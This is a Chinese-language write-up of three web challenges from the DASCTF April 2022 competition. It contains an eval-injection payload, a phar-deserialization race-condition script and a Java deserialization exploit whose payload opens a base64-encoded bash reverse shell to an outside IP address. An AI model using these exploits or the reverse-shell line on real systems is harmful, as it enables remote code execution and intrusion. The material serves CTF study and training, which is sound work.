【Web】2022DASCTF Apr X FATE 防疫挑战赛 题解(全)

目录

warmup-php

soeasy_php

warmup-java


warmup-php

spl_autoload_register函数实现了当程序遇到调用没有定义过的函数时,会去找./class/函数名.php路径下的php文件,并把它包含在程序中。

拿到附件拖进Seay里自动审计一下

显然利用终点为evaluateExpression()

public function evaluateExpression($_expression_,$_data_=array()){if(is_string($_expression_)){extract($_data_);return eval('return '.$_expression_.';');}else{$_data_[]=$this;return call_user_func_array($_expression_, $_data_);}}

全局搜一下触发点

TestView 继承 ListView 继承 Base 

以run为入口,不难审计得到调用链路

(看不懂的代码可以扔给gpt)

TestView#run()->TestView#renderContent()->TestView#renderSection($matches->TestView#renderTableBody()->TestView#renderTableRow($row)->TestView#evaluateExpression(TestView->rowHtmlOptionsExpression)

payload:

properties[template]={TableBody}&properties[data]=1&properties[rowHtmlOptionsExpression]=system("/readflag")

 

soeasy_php

右键查看源码,发现两个表单,第二个hidden了

先随便上传个文件看看

改前端,把hidden属性删掉,把submit注释去掉

 随便传下参,回显成功更换头像

再访问/uploads/head.png读到上传文件的内容 

 

尝试更换头像为敏感文件,实现任意读

访问/uploads/head.png,成功读到/etc/passwd

尝试去读/proc/1/environ和/flag均响应403,显然权限不够

于是退一步,用同样的方式去读/var/www/html目录下的upload.php和edit.php

upload.php

<?php
if (!isset($_FILES['file'])) {die("请上传头像");
}$file = $_FILES['file'];
$filename = md5("png".$file['name']).".png";
$path = "uploads/".$filename;
if(move_uploaded_file($file['tmp_name'],$path)){echo "上传成功: ".$path;
};

 

edit.php

<?php
ini_set("error_reporting","0");
class flag{public function copyflag(){exec("/copyflag"); //以root权限复制/flag 到 /tmp/flag.txt,并chown www-data:www-data /tmp/flag.txtecho "SFTQL";}public function __destruct(){$this->copyflag();}}function filewrite($file,$data){unlink($file);file_put_contents($file, $data);
}if(isset($_POST['png'])){$filename = $_POST['png'];if(!preg_match("/:|phar|\/\/|php/im",$filename)){$f = fopen($filename,"r");$contents = fread($f, filesize($filename));if(strpos($contents,"flag{") !== false){filewrite($filename,"Don't give me flag!!!");}}if(isset($_POST['flag'])) {$flag = (string)$_POST['flag'];if ($flag == "Give me flag") {filewrite("/tmp/flag.txt", "Don't give me flag");sleep(2);die("no no no !");} else {filewrite("/tmp/flag.txt", $flag);  //不给我看我自己写个flag。}$head = "uploads/head.png";unlink($head);if (symlink($filename, $head)) {echo "成功更换头像";} else {unlink($filename);echo "非正常文件,已被删除";};}
}

“无懈可击的web只有条件竞争能打败”

思路就是 

  1. 利用文件上传上传 phar文件

  2. 写入超长文件名使得 symlink()函数出错返回 false

  3. unlink()触发 phar 反序列化将flag写入到可读的/tmp/flag.txt 处

  4. 建立与 /tmp/flag.txt 与 uploads/head.png 的软连接

  5. 在建立与 /tmp/flag.txt 的软链接之前程序会将原来写入的flag给覆盖掉。所以要在覆盖flag后,另一个线程已经在copy /flag到 /tmp/flag.txt,这样 /uploads/head.png/tmp/flag.txt建立了链接,同时flag也没有被覆盖,然后访问 /uploads/head.png读取即可。

生成phar文件

<?phpclass flag{public function copyflag(){exec("/copyflag"); //以root权限复制/flag 到 /tmp/flag.txt,并chown www-data:www-data /tmp/flag.txtecho "SFTQL";}public function __destruct(){$this->copyflag();}}$a = new flag();
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("a.txt", "a");
$phar->stopBuffering();

 先上传恶意phar文件

 

跑条件竞争 

import requests
import threading
import timeurl = "http://20d746e7-b897-412d-ba98-cd8eb863a196.node5.buuoj.cn:81/"
phar = r"phar://uploads/fe409167fb98b72dcaff5486a612a575.png/a.txtaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
flag = r"/tmp/flag.txt"
head = "uploads/head.png"
s = requests.session()
proxies = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}# 触发phar
def uunlink():path = "edit.php"data = {"png": phar,"flag": "1"}r = s.post(url + path, data, proxies=proxies)if 400 <= r.status_code < 500:time.sleep(1.5)# 更改head.png为flag
def change():path = "edit.php"data = {"png": flag,"flag": "1"}r = s.post(url + path, data)if 400 <= r.status_code < 500:time.sleep(1.5)# 读取flag
def read_flag():path = headr = s.get(url + path)if 400 <= r.status_code < 500:time.sleep(1.5)else:print(r.text)while True:thread1 = threading.Thread(target=uunlink)thread1.start()thread2 = threading.Thread(target=change)thread2.start()thread3 = threading.Thread(target=read_flag)thread3.start()

 

warmup-java

没什么可用的依赖

反序列化入口

 

自定义handler

 

项目中并没有 引入commons-collections4的jar包,也就没有TransformingComparator和InvokerTransformer类。写链参考CC2,但compare之后的部分要用动态代理改一下

PriorityQueue#readObject() ->
PriorityQueue#heapify() ->
PriorityQueue#siftDown()->
PriorityQueue#siftDownUsingComparator() ->
proxy.compare(TemplatesImpl) ->
MyInvocationHandler#invoke() ->
TemplatesImpl#getOutputProperties ->
TemplatesImpl#newTransformer ->
TemplatesImpl#getTransletInstance ->
TemplatesImpl#defineTransletClasses ->
loader.defineClass(_bytecodes[i])

exp:

package com.example.warmup.exp;import com.example.warmup.MyInvocationHandler;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.util.Comparator;
import java.util.PriorityQueue;public class EXP {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static TemplatesImpl generateEvilTemplates() throws Exception {ClassPool pool = ClassPool.getDefault();pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));CtClass cc = pool.makeClass("Cat");String cmd = "java.lang.Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}\");";// 创建 static 代码块,并插入代码cc.makeClassInitializer().insertBefore(cmd);String randomClassName = "EvilCat" + System.nanoTime();cc.setName(randomClassName);cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));// 转换为bytesbyte[] classBytes = cc.toBytecode();byte[][] targetByteCodes = new byte[][]{classBytes};TemplatesImpl templates = TemplatesImpl.class.newInstance();setFieldValue(templates, "_bytecodes", targetByteCodes);// 进入 defineTransletClasses() 方法需要的条件setFieldValue(templates, "_name", "name" + System.nanoTime());setFieldValue(templates, "_class", null);setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());return templates;}//序列化public static void serialize(Object obj) throws IOException {ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("ser.bin"));oos.writeObject(obj);}//反序列化public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{ObjectInputStream ois=new ObjectInputStream(new FileInputStream(Filename));Object object=ois.readObject();return object;}public static String bytesTohexString(String s) throws IOException {File file = new File(s);FileInputStream fis = new FileInputStream(file);byte[] bytes = new byte[(int) file.length()];fis.read(bytes);if (bytes == null) {return null;} else {StringBuilder ret = new StringBuilder(2 * bytes.length);for(int i = 0; i < bytes.length; ++i) {int b = 15 & bytes[i] >> 4;ret.append("0123456789abcdef".charAt(b));b = 15 & bytes[i];ret.append("0123456789abcdef".charAt(b));}return ret.toString();}}public static void main(String[] args) throws Exception {TemplatesImpl templates = generateEvilTemplates();MyInvocationHandler myInvocationHandler = new MyInvocationHandler();Class c = myInvocationHandler.getClass();Field type = c.getDeclaredField("type");type.setAccessible(true);type.set(myInvocationHandler,Templates.class);//代理接口为Comparator,便于后续调用compare方法Comparator proxy = (Comparator) Proxy.newProxyInstance(MyInvocationHandler.class.getClassLoader(), new Class[]{Comparator.class}, myInvocationHandler);//初始化属性comparator为proxy类PriorityQueue priorityQueue = new PriorityQueue(2);priorityQueue.add(1);priorityQueue.add(2);Object[] queue = {templates,templates};setFieldValue(priorityQueue,"comparator",proxy);setFieldValue(priorityQueue,"queue",queue);serialize(priorityQueue);System.out.println(bytesTohexString("ser.bin"));}
}

打入payload 

 

监听,反弹shell,拿flag

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/822434.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

SpringBoot项目如何实现邮件发送

文章目录 1. 开启邮箱SMTP服务2. 导入pom依赖3. 在配置文件中添加邮箱配置3. 封装EmailTask类4. 写测试类 1. 开启邮箱SMTP服务 这里以163邮箱为例&#xff0c;点击设置——更多设置——POP3/SMTP/IMAP——开启服务 根据提示开启服务之后会得到一个授权码&#xff0c;只显示一…

(通义千问,miyagpt,AlchatOS,aitianhu1,a1r,1ai)分享6个好用的GPT

目录 1、通义千问 (aliyun.com) 2、MIYAGPT (miyadns.com) 3、AIchatOS 4、 Safeline Waf CE (aitianhu1.top)

数据库:SQL分类之DCL详解

1.管理用户 1.查询用户 use mysql ; select * from user ; 2.创建用户 create user 用户名主机名 identified by 密码 ; 例&#xff1a; //创建用户itcast ,只能够在当前主机local host访问&#xff0c;密码123456 create user itcastlocalhost identified by 123456;//创建用…

postgreSql判断表是否存在某个字段

在PostgreSQL中&#xff0c;可以使用information_schema.columns视图来检查表是否存在某个字段。以下是一个SQL查询示例&#xff0c;它检查名为sys_statlog的表中是否存在名为origin_type的字段&#xff1a; SELECT EXISTS (SELECT 1FROM information_schema.columnsWHERE tab…

攻防演练,现在收到通知服务器已经被攻破,作为蓝方,怎么检查服务器被攻破的痕迹

在攻防演练中&#xff0c;如果您的服务器被告知已经被攻破&#xff0c;重要的是要快速并系统地响应&#xff0c;以确定攻击的范围、方法和影响。这包括确认攻击的痕迹、哪些数据可能被访问或盗取&#xff0c;以及如何尽快恢复安全状态。以下是一系列步骤和建议&#xff0c;帮助…

Cisco ACI使用Postman配置交换机-未完待续

先看下不使用脚本的情况下是怎么配置交换机端口的&#xff1f; 例&#xff1a; 有10个交换机接口要开trunk&#xff0c;透传50个vlan&#xff0c; 使用GUI的操作方式为 1 进入EPG -->Static port 2 右键&#xff0c;绑定接口 3 选中node -->指定接口—>指定vlan —>…

python 列表对象函数

对象函数必须通过一个对象调用。 列表名.函数名() append() 将某一个元素对象添加在列表的表尾 如果添加的是其他的序列&#xff0c;该序列也会被看成是一个数据对象 count() 统计列表当中 某一个元素出现的次数 extend() 在当前列表中 将传入的其他序列的元素添加在表尾…

JAVA后端面试

一、基础 1、创建对象的方法 new、反射、clone、反序列化 Class cl Class.forName("TestMe"); 2、有哪些引用类型 强引用、软引用、弱引用、虚引用 3、JVM 类加载机制 双亲委派机制&#xff08;Parent-Delegate Model&#xff09;是Java类加载器中采用的一种…

hover时预览切换,点击后才正式切换

1、使用CSS的:hover伪类 虽然这不是通过JavaScript或jQuery直接绑定事件&#xff0c;但CSS的:hover伪类可以用来改变元素在鼠标移入和移出时的样式。这种方法主要用于视觉效果的改变&#xff0c;而不是执行复杂的JavaScript逻辑。 #myElement:hover { /* 当鼠标悬停在#myEleme…

【学习笔记】Python大数据处理与分析——pandas数据分析

一、pandas中的对象 1、Series对象 由两个相互关联的数组(values, index)组成&#xff0c;前者&#xff08;又称主数组&#xff09;存储数据&#xff0c;后者存储values内每个元素对应关联的标签。 import numpy as np import pandas as pds1 pd.Series([1, 3, 5, 7])print(…

js如何設置滾動到元素位置

在JavaScript中&#xff0c;你可以使用window.scrollTo()方法或元素的scrollIntoView()方法来设置滚动位置。这些方法允许你将页面滚动到特定的坐标或元素。 使用 window.scrollTo() window.scrollTo() 方法接受两个参数&#xff1a;x坐标和y坐标&#xff0c;分别代表水平滚动…

pyqt的人脸识别 基于face_recognition库

参考文献&#xff1a; 1、python face_recognition实现人脸识别系统_python facerecognition检测人脸-CSDN博客 2、cv2.VideoCapture()_cv2.videocapture(0)-CSDN博客 1、camera.py文件代码如下&#xff1b;目录如下 import sys from PyQt5.QtWidgets import QApplication, …

JS两个按钮水平排列

要使两个按钮在水平方向上对半铺满&#xff0c;你可以使用CSS中的Flexbox布局或Grid布局。下面是使用Flexbox和Grid分别实现的示例代码&#xff1a; Flexbox布局&#xff1a; <!DOCTYPE html> <html lang"en"> <head> <meta charset"UTF…

NineData正式将SQL开发正式升级为数据库DevOps

NineData SQL 开发早期主要提供 SQL 窗口&#xff08;IDE&#xff09;功能&#xff0c;产品经过将近两年时间的打磨&#xff0c;新增了大量的企业级功能&#xff0c;时至今日已经服务了上万开发者&#xff0c;覆盖了数据库设计、开发、测试、变更等生命周期的功能。 为了让企业…

深入理解数据结构第五弹——排序(2)——快速排序

排序&#xff08;1&#xff09;&#xff1a;深入了解数据结构第四弹——排序&#xff08;1&#xff09;——插入排序和希尔排序-CSDN博客 前言&#xff1a; 在前面我们已经讲过了几种排序方式&#xff0c;他们的效率有快有慢&#xff0c;今天我们来学习一种非常高效的排序方式…

笔记本电脑上的聊天机器人: 在英特尔 Meteor Lake 上运行 Phi-2

对应于其强大的能力&#xff0c;大语言模型 (LLM) 需要强大的算力支撑&#xff0c;而个人计算机上很难满足这一需求。因此&#xff0c;我们别无选择&#xff0c;只能将它们部署至由本地或云端托管的性能强大的定制 AI 服务器上。 为何需要将 LLM 推理本地化 如果我们可以在典配…

Hudi 表支持多种查询引擎对比

Hudi 表支持多种查询引擎对比 Apache Hudi有两种主要的表类型&#xff0c;分别是Copy on Write&#xff08;COW&#xff09;表和Merge on Read&#xff08;MOR&#xff09;表。 Copy on Write&#xff08;COW&#xff09;表&#xff1a; 特点&#xff1a;COW表在写入新数据时会…

windows下使用nginx设置静态资源路由

1、下载nginx http://nginx.org/en/download.html 下载稳定版本&#xff0c;以nginx/Windows-1.24.0为例&#xff0c;下载后解压&#xff0c;解压后如下&#xff1a; 2、启动nginx 打开cmd命令窗口&#xff0c;切换到nginx解压目录下&#xff1a; start nginx # 启动nginx服务…

OpenWrt 多拨负载均衡不起作用

检查 负载均衡->规则->Https->粘滞模式 是否启动&#xff0c;设置为 否 如果设置为是&#xff0c;那么根据官方描述&#xff1a; 来自相同源 IP 的流量&#xff0c;如果已经匹配过此规则并且在粘滞超时时间内&#xff0c;将会使用相同的 WAN 接口 意思就是如果你同一个…

实验六 智能手机互联网程序设计(微信程序方向)实验报告

实验目的和要求 请完成创建图片库应用&#xff0c;显示一系列预设的图片。 提供按钮来切换显示不同类别的图片。 二、实验步骤与结果&#xff08;给出对应的代码或运行结果截图&#xff09; 1.WXML <view> <button bindtap"showAll">所有图片</but…